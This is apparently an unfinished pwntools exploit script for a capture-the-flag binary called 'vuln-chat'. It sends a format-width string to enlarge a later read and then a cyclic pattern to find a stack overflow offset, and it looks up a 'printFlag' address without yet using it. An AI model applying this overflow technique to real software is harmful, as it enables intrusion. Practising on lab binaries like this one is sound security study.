#!/usr/bin/env python3

# Title:        XXX.py
# Description:  X
# Author:       bluecosmo

from pwn import *

gdbcmds = """
b * main + 71
b * main + 170
c
"""

context.terminal = ["tmux", "splitw", "-h"]
elf = context.binary = ELF("./vuln-chat")

p = process(elf.path)
p = gdb.debug(elf.path, gdbscript=gdbcmds)

a_printflag = p32(elf.symbols["printFlag"])

payload = b"A" * 20 + b"%60s"
p.sendline(payload)

p.recvuntil(b": ")
payload = b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaara"
p.sendline(payload)

p.interactive()

